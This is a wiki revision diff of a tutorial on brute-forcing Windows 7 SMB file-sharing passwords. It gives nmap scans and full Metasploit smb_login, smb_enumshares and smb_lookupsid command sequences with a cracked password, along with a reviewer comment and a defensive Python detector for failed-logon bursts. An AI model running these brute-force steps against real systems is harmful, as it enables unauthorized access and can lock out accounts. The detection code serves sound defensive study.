Difference between revisions of "Kali Linux: Cracking the File Sharing Password on Windows 7"

From OnnoWiki
Line 11: Line 11:
 
  nmap -sS  -A -O  192.168.0.0/24
 
  nmap -sS  -A -O  192.168.0.0/24
 
  nmap -sS  -A -O  192.168.0.7,90
 
  nmap -sS  -A -O  192.168.0.7,90
 
 
 
 
 
 
Screenshot from 2014-06-24 03:32:42
 
 
 
 
 
 
 
 
 
 
Nmap results shows that the target machine had smb with user level authentication. its clearly show we can authenticate smb with username and password.
 
 
 
 
 
 
 
 
 
 
 
 
Next we going to use metasploit framework to  brute-login against the smb of target machine. so we going to use smb_login module in msfconsole.
 
 
 
 
 
 
 
 
 
 
 
 
Metasploit’s smb_login module will attempt to login via SMB across a provided range of IP addresses.
 
 
 
 
 
 
 
 
 
 
#msfconsole
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_login
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > show options
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set SMBUser sathish
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set PASS_FILE  ‘/home/sathish/password’
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > set THREADS 10
 
 
 
 
 
 
 
 
#msf auxiliary(smb_login) > run
 
 
 
 
 
 
 
 
Above I used SMBUser has sathish because, My target machines computer name is sathish-PC so there is more chance of having an account with name the sathish and the password is brute-forced using a password file containing word lists in my home directory.
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:28:53
 
 
 
 
 
 
 
 
 
 
Keep in mind, this is very “loud” as it will show up as a failed login attempt in the event logs of  Windows box it touches. Be thoughtful on the network you are taking this action on.
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:29:29
 
 
 
 
 
 
 
 
After getting successful brute-force login, we need to  enumerates for SMB shares on the target machine with the known set of user credential.
 
 
 
 
 
 
 
 
 
 
The smb_enumshares module, as would be expected, enumerates any SMB shares that are available on a remote system.
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_enumshares
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > show options
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set SMBUser sathish
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set SMBPass bhuvi
 
 
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > set THREADS 10
 
 
 
 
 
 
#msf auxiliary(smb_enumshares) > run
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:31:34
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:32:26
 
 
 
 
 
 
 
 
 
 
It will list the SMB share on the target machine and now we need more details about the target  for the SID of users and groups.
 
 
 
 
 
 
 
 
The smb_lookupsid module brute-forces SID lookups on a range of targets to determine what local users exist the system. Knowing what users exist on a system can help to login.
 
 
 
 
 
 
 
 
#msf > use auxiliary/scanner/smb/smb_lookupsid
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > show options
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.31.2
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set SMBPass bhuvi
 
 
 
 
 
 
#msf auxiliary(smb_lookupsid) > set SMBUser sathish
 
 
 
 
 
  
 
   
 
   
 +
==Hack Password==
  
#msf auxiliary(smb_lookupsid) > run
+
Menggunakan cara bruteforce untuk hack password.
 
+
Cara ini cukup "ribut" karena semua kegiatan kita akan dicatat / di log oleh server, sehingga akan ketahuan.
 
   
 
   
  
   
+
  msfconsole thankyou
 +
use auxiliary/scanner/smb/smb_login
 +
show options
 +
set RHOSTS 192.168.31.2
 +
set SMBUser sathish
 +
set PASS_FILE  ‘/home/sathish/password’
 +
set THREADS 10
 +
run
  
 
   
 
   
  
Screenshot from 2014-06-24 13:34:11
 
  
   
+
  use auxiliary/scanner/smb/smb_enumshares
 +
show options
 +
set RHOSTS 192.168.31.2
 +
set SMBUser sathish
 +
set SMBPass bhuvi
 +
set THREADS 10
 +
run
  
 
  
Screenshot from 2014-06-24 13:37:28
+
use auxiliary/scanner/smb/smb_lookupsid
 
+
  show options
   
+
  set RHOSTS 192.168.31.2
 
+
  set SMBPass bhuvi
   
+
  set SMBUser sathish
 
+
  run
It will list the users and groups on the target machine with SID numbers, its help us to think more about the target system and from known user credential we going to mount the windows share on our attacking computer.
 
 
 
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 14:08:07
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 19:44:03
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 14:11:08
 
 
 
 
 
 
Screenshot from 2014-06-24 19:41:43
 
 
 
 
 
 
 
 
 
[Note]
 
 
 
 
 
 
 
 
 
 
 
 
A brute force attack or an aggressive password guessing attack is very noisy and will likely lock out user accounts depending on how the group policies for that domain have been configured.
 
 
 
   
 
 
 
   
 
 
 
   
 
  
So brute forcing windows accounts isn’t generally a very good idea due to lockout settings and the possibility of creating a Denial of Service condition. Most windows networks have group policies that enforce a lockout of X minutes after Y failed attempts. As such, brute force attacks are pretty much too risky.
 
  
 
==Referensi==
 
==Referensi==
  
 
* https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/
 
* https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/
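
Review bot: in the added smb_login block, `set PASS_FILE  ‘/home/sathish/password’` wraps the path in typographic quotes, which are not shell quotes, so msfconsole would treat them as part of the file name; use plain quotes or none. The first added command, `msfconsole thankyou`, also carries a stray word that should be dropped. Separately, the new text keeps only the one-sentence remark that the activity is logged and removes the old [Note] paragraphs on account lockout ("a lockout of X minutes after Y failed attempts") and the resulting denial-of-service condition; suggest carrying that caveat over into the translated text rather than deleting it.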

Revision as of 07:48, 11 February 2016

Source: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/



Network Scan

Example

nmap -sS  -A -O  192.168.0.7
nmap -sS  -A -O  192.168.0.0/24
nmap -sS  -A -O  192.168.0.7,90


Hack Password

This uses brute force to guess the password. The method is quite "noisy" because everything we do is recorded in the server's logs, so it will be noticed.


msfconsole
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.31.2
set SMBUser sathish
set PASS_FILE /home/sathish/password
set THREADS 10
run



use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS 192.168.31.2
set SMBUser sathish
set SMBPass bhuvi
set THREADS 10
run


use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS 192.168.31.2
set SMBPass bhuvi
set SMBUser sathish
run
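
The "Hack Password" section notes that every attempt is logged by the server. As an added example (not part of the original page), the sketch below shows how a defender could spot that trail in exported Windows Security events. The CSV layout, the threshold and window values, and the sample records, including the source host 192.168.31.9, are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records (not real logs): time, event ID, logon type, account, source.
# 4625 = failed logon, 4624 = successful logon; logon type 3 = network logon (SMB).
SAMPLE = """\
2014-06-24T13:28:50,4625,3,sathish,192.168.31.9
2014-06-24T13:28:51,4625,3,sathish,192.168.31.9
2014-06-24T13:28:52,4625,3,sathish,192.168.31.9
2014-06-24T13:28:53,4625,3,sathish,192.168.31.9
2014-06-24T13:28:54,4625,3,sathish,192.168.31.9
2014-06-24T13:28:55,4625,3,sathish,192.168.31.9
2014-06-24T13:28:56,4624,3,sathish,192.168.31.9
2014-06-24T13:30:00,4625,3,ana,192.168.31.20
2014-06-24T13:30:05,4624,3,ana,192.168.31.20
2014-06-24T13:31:00,4625,2,sathish,-
"""

def parse(text):
    """Yield (time, event_id, logon_type, account, source) tuples from the CSV text."""
    for line in text.strip().splitlines():
        ts, eid, ltype, user, src = line.split(",")
        yield datetime.fromisoformat(ts), int(eid), int(ltype), user, src

def detect(events, threshold=5, window=timedelta(seconds=60)):
    """Flag bursts of failed network logons and any success that follows a burst."""
    failures = defaultdict(deque)   # (source, account) -> times of recent failures
    flagged, alerts = set(), []
    for ts, eid, ltype, user, src in sorted(events):
        if ltype != 3:              # only network logons are relevant to SMB guessing
            continue
        key = (src, user)
        q = failures[key]
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if eid == 4625:
            q.append(ts)
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("failure_burst", src, user, ts))
        elif eid == 4624 and len(q) >= threshold:
            # A guess finally worked: treat the account as compromised.
            alerts.append(("success_after_burst", src, user, ts))
            q.clear()
            flagged.discard(key)
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE)):
        print(alert)
```

A single mistyped password followed by a correct one, as in the constructed "ana" records, stays below the threshold and raises no alert.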


References